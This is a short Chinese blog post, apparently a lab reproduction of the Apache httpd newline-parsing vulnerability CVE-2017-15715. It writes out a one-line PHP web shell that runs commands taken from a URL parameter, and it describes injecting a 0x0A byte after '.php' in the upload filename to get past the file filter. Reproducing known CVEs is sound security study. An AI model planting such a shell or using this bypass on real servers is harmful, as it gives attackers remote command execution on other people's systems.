Apache httpd 换行解析漏洞复现(CVE-2017-15715)

Web页面:

新建一个一句话木马:

0.php

复制代码
<?php system($_GET[0]); ?>

上传木马, burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后,我们访问一下。发现木马上传成功。

相关推荐
t***D26414 分钟前
MySQL安全
数据库·mysql·安全
木童66238 分钟前
nginx安装步骤详解
linux·运维·服务器·网络·nginx
tan180°2 小时前
Linux网络IP(上)(15)
linux·网络·tcp/ip
EasyDSS3 小时前
革新传统勘探:视频推流平台EasyDSS无人机推流如何赋能高效安全的地质考察?
安全·音视频·无人机
“αβ”4 小时前
MySQL库的操作
linux·服务器·网络·数据库·c++·mysql·oracle
_星辰大海乀4 小时前
TCP 协议
网络·网络协议·tcp/ip·tcp
n***29324 小时前
PHP安全编程实践
开发语言·安全·php
翼龙云_cloud5 小时前
亚马逊云渠道商:aws安全组没有加ip用ip访问会有什么问题?
运维·tcp/ip·安全·云计算·aws
一起学安全技术5 小时前
C11期作业27(09.27)
网络安全
LZ7工作室6 小时前
MAC编程:在MACOS安装和使用 Git 的方法
网络·git·macos·github·个人开发